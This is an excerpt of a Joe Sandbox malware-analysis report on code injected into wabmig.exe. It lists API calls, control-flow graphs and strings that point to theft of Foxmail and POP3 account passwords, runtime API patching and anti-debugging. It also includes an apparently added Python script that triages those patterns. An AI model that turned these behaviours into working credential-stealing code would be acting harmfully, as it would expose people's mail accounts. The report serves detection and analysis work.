                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                            • String ID:
                                                                            • API String ID: 1083526818-0
                                                                            • Opcode ID: a16ffdbcfb5b15a723141e7cd465aa028e1f778265c81a52d0141a42a27a0935
                                                                            • Instruction ID: 40b4274f53672d6d0d65c06fb74750a4a47f7ea25b63d2bb1bd667ccb8dbead2
                                                                            • Opcode Fuzzy Hash: a16ffdbcfb5b15a723141e7cd465aa028e1f778265c81a52d0141a42a27a0935
                                                                            • Instruction Fuzzy Hash: 2521E1B25043586BC720FA64DC4CFCB7B9CEF84714F040D2ABA98D3090EB74E2458796

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 23231434
                                                                              • Part of subcall function 232310F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23231137
                                                                              • Part of subcall function 232310F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23231151
                                                                              • Part of subcall function 232310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323115C
                                                                              • Part of subcall function 232310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323116D
                                                                              • Part of subcall function 232310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2323117C
                                                                              • Part of subcall function 232310F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23231193
                                                                              • Part of subcall function 232310F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 232311D0
                                                                              • Part of subcall function 232310F1: FindClose.KERNEL32(00000000), ref: 232311DB
                                                                            • lstrlenW.KERNEL32(?), ref: 232314C5
                                                                            • lstrlenW.KERNEL32(?), ref: 232314E0
                                                                            • lstrlenW.KERNEL32(?,?), ref: 2323150F
                                                                            • lstrcatW.KERNEL32(00000000), ref: 23231521
                                                                            • lstrlenW.KERNEL32(?,?), ref: 23231547
                                                                            • lstrcatW.KERNEL32(00000000), ref: 23231553
                                                                            • lstrlenW.KERNEL32(?,?), ref: 23231579
                                                                            • lstrcatW.KERNEL32(00000000), ref: 23231585
                                                                            • lstrlenW.KERNEL32(?,?), ref: 232315AB
                                                                            • lstrcatW.KERNEL32(00000000), ref: 232315B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                            • API String ID: 672098462-2938083778
                                                                            • Opcode ID: 06ecf8fa8914c67ecc65719c1a4e25ef6ce80722e705a4b04760fa9bad901fed
                                                                            • Instruction ID: a1af3b83eabb4511a64cb1bce098780ae9b164adbf93623a75a6b00b3cb4dd4b
                                                                            • Opcode Fuzzy Hash: 06ecf8fa8914c67ecc65719c1a4e25ef6ce80722e705a4b04760fa9bad901fed
                                                                            • Instruction Fuzzy Hash: ED81C171A00368A9DB30DBA1DC85FEE7379EF85700F0005D6FA09E7190EAB16AC5CB95

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(2323C7DD), ref: 2323C7E6
                                                                            • GetModuleHandleA.KERNEL32(?,2323C7DD), ref: 2323C838
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 2323C860
                                                                              • Part of subcall function 2323C803: GetProcAddress.KERNEL32(00000000,2323C7F4), ref: 2323C804
                                                                              • Part of subcall function 2323C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C816
                                                                              • Part of subcall function 2323C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C82A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2099061454-0
                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction ID: 3c202d2a345a4957afd082faea93aa7f23f7f4b684b40103ba9980a39e367eab
                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction Fuzzy Hash: 5E0126C055537238A62376743C049AA5FDCDB23660B1837D6E20086093C9A087C2C3A9

                                                                            Control-flow Graph

                                                                            [Control-flow graph for the function at 2323c7a7 (basic blocks 2323c7a7 to 2323c877 with executed/not-executed colouring and calls to GetModuleHandleA, GetProcAddress and VirtualProtect); the rendered graph is not recoverable from the page]
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,2323C7DD), ref: 2323C838
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 2323C860
                                                                              • Part of subcall function 2323C7E6: GetModuleHandleA.KERNEL32(2323C7DD), ref: 2323C7E6
                                                                              • Part of subcall function 2323C7E6: GetProcAddress.KERNEL32(00000000,2323C7F4), ref: 2323C804
                                                                              • Part of subcall function 2323C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C816
                                                                              • Part of subcall function 2323C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C82A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2099061454-0
                                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                            • Instruction ID: d3bd38a2004cf1ece24b983dba3dc5f7d0164fdf46037b9edf5e683abf0abf22
                                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                            • Instruction Fuzzy Hash: 602138E24583A26FE7239B746C04BA67FD8DB13260F1C26D6D140CB143D5A89BD6C3A6

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 107 2323c803-2323c80b GetProcAddress 108 2323c82d 107->108 109 2323c80d-2323c81a VirtualProtect 107->109 112 2323c82f-2323c833 108->112 110 2323c82c 109->110 111 2323c81c-2323c82a VirtualProtect 109->111 110->108 111->110 113 2323c872 call 2323c877 112->113 114 2323c835-2323c83d GetModuleHandleA 112->114 116 2323c83f-2323c847 114->116 116->116 117 2323c849-2323c84c 116->117 117->112 118 2323c84e-2323c850 117->118 119 2323c852-2323c854 118->119 120 2323c856-2323c85e 118->120 121 2323c85f-2323c865 GetProcAddress 119->121 120->121 124 2323c866-2323c86e 121->124 126 2323c870 124->126 126->117
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(00000000,2323C7F4), ref: 2323C804
                                                                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C816
                                                                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C82A
                                                                            • GetModuleHandleA.KERNEL32(?,2323C7DD), ref: 2323C838
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 2323C860
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                                            • String ID:
                                                                            • API String ID: 2152742572-0
                                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                            • Instruction ID: 91df996185b779b8dcc1b9d3461850154906e40474741573968a118eb02539fa
                                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                            • Instruction Fuzzy Hash: B7F0A4C15553623CFA2365743C45EB65FDCC727660B183AD5A200C7183D89587C683F5
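
The two function entries above (2323C7A7 and the 2323C803 path through its subcall 2323C7E6) carry the report's flattened control-flow graph and its API-reference lines. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses both formats, lists the calls reachable from a function's entry block in address order, and flags the VirtualProtect pattern recorded here, a PAGE_READWRITE (0x04) window of 0x78 bytes opened at a GetProcAddress-resolved address followed by a second VirtualProtect of the same size whose new-protection argument the report left as '?'. Reading that second call as the saved old protection being restored is my interpretation; the grammar of the flattened graph (block id, address range, `call <hex>`, bare API name, `* N` repeat count) is inferred from the report text, and all function names are mine. The sample input is copied from the 2323C803 entry.

```python
import re
from collections import deque, namedtuple
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
API_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]+)")  # "Api.MODULE(args), ref: ADDR"
PAGE_READWRITE = "00000004"  # VirtualProtect's flNewProtect, as the report prints it

ApiRef = namedtuple("ApiRef", "api module args ref")


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    calls: list = field(default_factory=list)  # Win32 APIs and sub_<addr> targets in this block


def parse_cfg(text):
    """Grammar inferred from the report: per block '<id> <start>[-<end>]' followed by
    'call <hex>', bare API names and '* N' repeat counts; '<from>-><to>' per edge."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok, m = tokens[i], EDGE_RE.match(tokens[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit():  # block id; its address range is always the next token
            lo, _, hi = tokens[i + 1].partition("-")
            cur = blocks[int(tok)] = Block(int(tok), int(lo, 16), int(hi or lo, 16))
            i += 2
        elif tok == "call":  # internal call target
            cur.calls.append("sub_" + tokens[i + 1])
            i += 2
        elif tok == "*":  # "* N": the preceding call is made N times
            cur.calls.extend([cur.calls[-1]] * (int(tokens[i + 1]) - 1))
            i += 2
        else:  # bare Win32 API name
            cur.calls.append(tok)
            i += 1
    return blocks, edges


def entry_block(blocks, edges):
    """The block nothing jumps to; self-loops such as 116->116 do not count."""
    targets = {dst for src, dst in edges if src != dst}
    return min(b for b in blocks if b not in targets)


def reachable_calls(blocks, edges, entry):
    """(address, call) for every block reachable from entry, in address order."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    seen, todo = {entry}, deque([entry])
    while todo:
        for nxt in succ.get(todo.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                todo.append(nxt)
    ordered = sorted((blocks[n] for n in seen), key=lambda b: b.start)
    return [(b.start, c) for b in ordered for c in b.calls]


def parse_api_lines(lines):
    """Read the report's 'Api.MODULE(arg,arg,...), ref: ADDR' lines, subcall lines included."""
    matches = (API_RE.search(line) for line in lines)
    return [ApiRef(m.group(1), m.group(2), m.group(3).split(","), int(m.group(4), 16))
            for m in matches if m]


def rw_windows(refs):
    """Pair VirtualProtect(addr, size, PAGE_READWRITE, &old) with the next VirtualProtect of
    the same size whose new protection is the unresolved '?' (read as the old value being
    restored): a temporary write window over code. Returns (open ref, restore ref, size)."""
    vps = [r for r in refs if r.api == "VirtualProtect"]
    return [(a.ref, b.ref, int(a.args[1], 16)) for a, b in zip(vps, vps[1:])
            if a.args[2] == PAGE_READWRITE and b.args[1] == a.args[1] and b.args[2] == "?"]


# Sample input copied from the 2323C803 function entry of this report.
SAMPLE_CFG = (
    "control_flow_graph 107 2323c803-2323c80b GetProcAddress 108 2323c82d 107->108 "
    "109 2323c80d-2323c81a VirtualProtect 107->109 112 2323c82f-2323c833 108->112 110 2323c82c "
    "109->110 111 2323c81c-2323c82a VirtualProtect 109->111 110->108 111->110 113 2323c872 "
    "call 2323c877 112->113 114 2323c835-2323c83d GetModuleHandleA 112->114 116 2323c83f-2323c847 "
    "114->116 116->116 117 2323c849-2323c84c 116->117 117->112 118 2323c84e-2323c850 117->118 "
    "119 2323c852-2323c854 118->119 120 2323c856-2323c85e 118->120 121 2323c85f-2323c865 "
    "GetProcAddress 119->121 120->121 124 2323c866-2323c86e 121->124 126 2323c870 124->126 126->117"
)
SAMPLE_APIS = [
    "• GetProcAddress.KERNEL32(00000000,2323C7F4), ref: 2323C804",
    "• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C816",
    "• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2323C7F4,2323C7DD), ref: 2323C82A",
    "• GetModuleHandleA.KERNEL32(?,2323C7DD), ref: 2323C838",
    "• GetProcAddress.KERNEL32(00000000,00000000), ref: 2323C860",
]

if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE_CFG)
    for addr, call in reachable_calls(blocks, edges, entry_block(blocks, edges)):
        print(f"{addr:08x}  {call}")
    for opened, restored, size in rw_windows(parse_api_lines(SAMPLE_APIS)):
        print(f"RW window of {size:#x} bytes: opened at {opened:08X}, restored at {restored:08X}")
```

Run as-is it prints the six calls of the 2323C803 function in address order and the single 0x78-byte read/write window between 2323C816 and 2323C82A. Fed every APIs list of a report, the same pass gives a quick triage of which functions open write windows over GetProcAddress-resolved exports, which is the behaviour a practitioner wants to look at first when a signature such as "Contains functionality to dynamically determine API calls" fires.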
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 232361DA
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 232361E4
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 232361F1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: 629306f433cd8e9280b3cba3c511f82de6c9f266815438c4dae917c9c9289031
                                                                            • Instruction ID: 8a115c5e9e4c587602239d5989f35cf2ca320b2d2b16b570c1a247da347d3789
                                                                            • Opcode Fuzzy Hash: 629306f433cd8e9280b3cba3c511f82de6c9f266815438c4dae917c9c9289031
                                                                            • Instruction Fuzzy Hash: 0B31C2B49113189BCB21DF24DD8878DBBB8AF18710F5081DAE81CA7250E7749BC18F45
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,23234A8A,?,23242238,0000000C,23234BBD,00000000,00000000,00000001,23232082,23242108,0000000C,23231F3A,?), ref: 23234AD5
                                                                            • TerminateProcess.KERNEL32(00000000,?,23234A8A,?,23242238,0000000C,23234BBD,00000000,00000000,00000001,23232082,23242108,0000000C,23231F3A,?), ref: 23234ADC
                                                                            • ExitProcess.KERNEL32 ref: 23234AEE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: 4cdf5d783ff810dde85570d5d4207c95239ee0469eb24f48a3505f5758ce1faa
                                                                            • Instruction ID: d6404c889b57ac7160f55db884bf09c0c3bf8a90efd748c5b2e58e205da317e0
                                                                            • Opcode Fuzzy Hash: 4cdf5d783ff810dde85570d5d4207c95239ee0469eb24f48a3505f5758ce1faa
                                                                            • Instruction Fuzzy Hash: 74E04676100208AFCF017F64CD4DA893B2AFF12B41B008090FA448B021CB39E9C2CA44
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HeapProcess
                                                                            • String ID:
                                                                            • API String ID: 54951025-0
                                                                            • Opcode ID: 700332c11abcedf50bcb1828204868037aba2065745104ab197d4f4b637e0318
                                                                            • Instruction ID: 805e047d04d3b47a46730f62a8eb6e382439ba76d916b087f98f3b85c60eab85
                                                                            • Opcode Fuzzy Hash: 700332c11abcedf50bcb1828204868037aba2065745104ab197d4f4b637e0318
                                                                            • Instruction Fuzzy Hash: 4DA001706053028F9754AE35970E24D3AADAA65B91716816AAA09C5154EB28C4619A05

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 136 2323173a-232317fe call 2323c030 call 23232c40 * 2 143 23231803 call 23231cca 136->143 144 23231808-2323180c 143->144 145 23231812-23231816 144->145 146 232319ad-232319b1 144->146 145->146 147 2323181c-23231837 call 23231ede 145->147 150 2323199f-232319ac call 23231ee7 * 2 147->150 151 2323183d-23231845 147->151 150->146 152 23231982-23231985 151->152 153 2323184b-2323184e 151->153 155 23231987 152->155 156 23231995-23231999 152->156 153->152 157 23231854-23231881 call 232344b0 * 2 call 23231db7 153->157 159 2323198a-2323198d call 23232c40 155->159 156->150 156->151 170 23231887-2323189f call 232344b0 call 23231db7 157->170 171 2323193d-23231943 157->171 165 23231992 159->165 165->156 170->171 185 232318a5-232318a8 170->185 173 23231945-23231947 171->173 174 2323197e-23231980 171->174 173->174 176 23231949-2323194b 173->176 174->159 178 23231961-2323197c call 232316aa 176->178 179 2323194d-2323194f 176->179 178->165 182 23231951-23231953 179->182 183 23231955-23231957 179->183 182->178 182->183 186 23231959-2323195b 183->186 187 2323195d-2323195f 183->187 188 232318c4-232318dc call 232344b0 call 23231db7 185->188 189 232318aa-232318c2 call 232344b0 call 23231db7 185->189 186->178 186->187 187->174 187->178 188->156 198 232318e2-2323193b call 232316aa call 232315da call 23232c40 * 2 188->198 189->188 189->198 198->156
                                                                            APIs
                                                                              • Part of subcall function 23231CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D1B
                                                                              • Part of subcall function 23231CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23231D37
                                                                              • Part of subcall function 23231CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23231D4B
                                                                            • _strlen.LIBCMT ref: 23231855
                                                                            • _strlen.LIBCMT ref: 23231869
                                                                            • _strlen.LIBCMT ref: 2323188B
                                                                            • _strlen.LIBCMT ref: 232318AE
                                                                            • _strlen.LIBCMT ref: 232318C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen$File$CopyCreateDelete
                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                            • API String ID: 3296212668-3023110444
                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                            • Instruction ID: fb598f50e94e270bb2e30410bddd74e3df208a4f4b5031900faa403012815ff2
                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                            • Instruction Fuzzy Hash: 1361F4F1D04329AAEF21ABA4CC40BDEB7B9AF17200F0444D6D245A7290DBB47AC78B55

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                            • API String ID: 4218353326-230879103
                                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                            • Instruction ID: fed4f684e8267619f6a4264abe10f76bbbf7b69ed2ad296beba5e90af00c93d0
                                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                            • Instruction Fuzzy Hash: 787106F1D043695BDB21ABB49C84ADF7BFC9F1A200F1444E6D644D7241E6B4A7C5CBA0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 276 23237cc2-23237cd6 277 23237d44-23237d4c 276->277 278 23237cd8-23237cdd 276->278 280 23237d93-23237dab call 23237e35 277->280 281 23237d4e-23237d51 277->281 278->277 279 23237cdf-23237ce4 278->279 279->277 282 23237ce6-23237ce9 279->282 290 23237dae-23237db5 280->290 281->280 284 23237d53-23237d90 call 2323571e * 4 281->284 282->277 285 23237ceb-23237cf3 282->285 284->280 288 23237cf5-23237cf8 285->288 289 23237d0d-23237d15 285->289 288->289 292 23237cfa-23237d0c call 2323571e call 232390ba 288->292 295 23237d17-23237d1a 289->295 296 23237d2f-23237d43 call 2323571e * 2 289->296 293 23237db7-23237dbb 290->293 294 23237dd4-23237dd8 290->294 292->289 302 23237dd1 293->302 303 23237dbd-23237dc0 293->303 298 23237df0-23237dfc 294->298 299 23237dda-23237ddf 294->299 295->296 304 23237d1c-23237d2e call 2323571e call 232391b8 295->304 296->277 298->290 311 23237dfe-23237e0b call 2323571e 298->311 308 23237de1-23237de4 299->308 309 23237ded 299->309 302->294 303->302 313 23237dc2-23237dd0 call 2323571e * 2 303->313 304->296 308->309 316 23237de6-23237dec call 2323571e 308->316 309->298 313->302 316->309
                                                                            APIs
                                                                            • ___free_lconv_mon.LIBCMT ref: 23237D06
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 232390D7
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 232390E9
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 232390FB
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 2323910D
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 2323911F
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 23239131
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 23239143
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 23239155
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 23239167
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 23239179
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 2323918B
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 2323919D
                                                                              • Part of subcall function 232390BA: _free.LIBCMT ref: 232391AF
                                                                            • _free.LIBCMT ref: 23237CFB
                                                                              • Part of subcall function 2323571E: HeapFree.KERNEL32(00000000,00000000,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?), ref: 23235734
                                                                              • Part of subcall function 2323571E: GetLastError.KERNEL32(?,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?,?), ref: 23235746
                                                                            • _free.LIBCMT ref: 23237D1D
                                                                            • _free.LIBCMT ref: 23237D32
                                                                            • _free.LIBCMT ref: 23237D3D
                                                                            • _free.LIBCMT ref: 23237D5F
                                                                            • _free.LIBCMT ref: 23237D72
                                                                            • _free.LIBCMT ref: 23237D80
                                                                            • _free.LIBCMT ref: 23237D8B
                                                                            • _free.LIBCMT ref: 23237DC3
                                                                            • _free.LIBCMT ref: 23237DCA
                                                                            • _free.LIBCMT ref: 23237DE7
                                                                            • _free.LIBCMT ref: 23237DFF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                            • String ID:
                                                                            • API String ID: 161543041-0
                                                                            • Opcode ID: 88090a361ad591bd0e472194af0b103cb88e20a6d4f33704a4e8359ad67b0b03
                                                                            • Instruction ID: 39f2bb9749752bab30c59776227c2012db27c2b655473e459e8037c66f943cba
                                                                            • Opcode Fuzzy Hash: 88090a361ad591bd0e472194af0b103cb88e20a6d4f33704a4e8359ad67b0b03
                                                                            • Instruction Fuzzy Hash: 14312AB161030ADFEB21AA38DD40B66B7E9AF02210F2444AAE959D7155DFB1FAC1CB14

                                                                            APIs
                                                                            • _free.LIBCMT ref: 232359EA
                                                                              • Part of subcall function 2323571E: HeapFree.KERNEL32(00000000,00000000,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?), ref: 23235734
                                                                              • Part of subcall function 2323571E: GetLastError.KERNEL32(?,?,2323924F,?,00000000,?,00000000,?,23239276,?,00000007,?,?,23237E5A,?,?), ref: 23235746
                                                                            • _free.LIBCMT ref: 232359F6
                                                                            • _free.LIBCMT ref: 23235A01
                                                                            • _free.LIBCMT ref: 23235A0C
                                                                            • _free.LIBCMT ref: 23235A17
                                                                            • _free.LIBCMT ref: 23235A22
                                                                            • _free.LIBCMT ref: 23235A2D
                                                                            • _free.LIBCMT ref: 23235A38
                                                                            • _free.LIBCMT ref: 23235A43
                                                                            • _free.LIBCMT ref: 23235A51
                                                                            Memory Dump Source
                                                                            • Source File: 0000000C.00000002.3772969016.0000000023231000.00000040.00001000.00020000.00000000.sdmp, Offset: 23230000, based on PE: true
                                                                            • Associated: 0000000C.00000002.3772946549.0000000023230000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 0000000C.00000002.3772969016.0000000023246000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_12_2_23230000_wabmig.jbxd
